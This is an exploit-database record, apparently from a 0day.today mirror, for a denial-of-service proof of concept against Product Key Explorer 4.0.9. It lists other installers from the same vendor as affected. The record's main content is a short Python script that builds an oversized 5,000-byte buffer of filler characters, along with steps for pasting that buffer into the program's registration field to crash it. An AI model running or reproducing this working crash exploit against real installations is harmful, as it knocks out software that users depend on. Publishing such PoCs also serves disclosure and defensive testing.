{"id": "1337DAY-ID-31853", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Product Key Explorer 4.0.9 - Denial of Service Exploit", "description": "", "published": "2018-12-27T00:00:00", "modified": "2018-12-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/31853", "reporter": "T3jv1l", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-03T02:05:25", "viewCount": 57, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1663695782, "score": 1663695947}, "_internal": {"score_hash": "003f3cd2ef76b4ab9e5dba677e15911f"}, "sourceHref": "https://0day.today/exploit/31853", "sourceData": "# Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC)\n# Exploit Author: T3jv1l\n# Vendor Homepage: :http://www.nsauditor.com\n# Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe\n# Contact: https://twitter.com/T3jv1l\n# Version: Product Key Explorer 4.0.9\n# Tested on: Windows 7 SP1 x86\n\n# Other affected software from the vendor\n# Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe\n# Software: http://www.nsauditor.com/downloads/apkf_setup.exe\n# Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe\n# Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe\n# Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe\n# Software: http://www.nsauditor.com/downloads/spotie_setup.exe\n# Software: http://www.nsauditor.com/downloads/spotftp_setup.exe\n# Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe\n# Software: http://www.nsauditor.com/downloads/nsi_setup.exe\n# Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe\n# Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe\n# Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe\n# Software: http://www.nsauditor.com/downloads/dnss_setup.exe\n\n# PoC:\n# 1. Download and install the setup file\n# 2. A file \"PoC.txt\" will be created\n# 3. Click Help > Register... in tool bar\n# 4. Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field \n# 5. Click OK and BOOMMMM !!!! \n\n#!/usr/bin/python\n\nbuffer = \"\\x41\" * 2000\nbuffer += \"\\x42\" * 2000\nbuffer += \"\\x43\" * 1000\n\npayload = buffer\ntry:\n f=open(\"PoC.txt\",\"w\")\n print \"[+] Creating %s bytes payload...\" %len(payload)\n f.write(payload)\n f.close()\n print \"[+] File created!\"\nexcept:\n print \"File cannot be created\"\n", "category": "dos / poc", "verified": true}
{}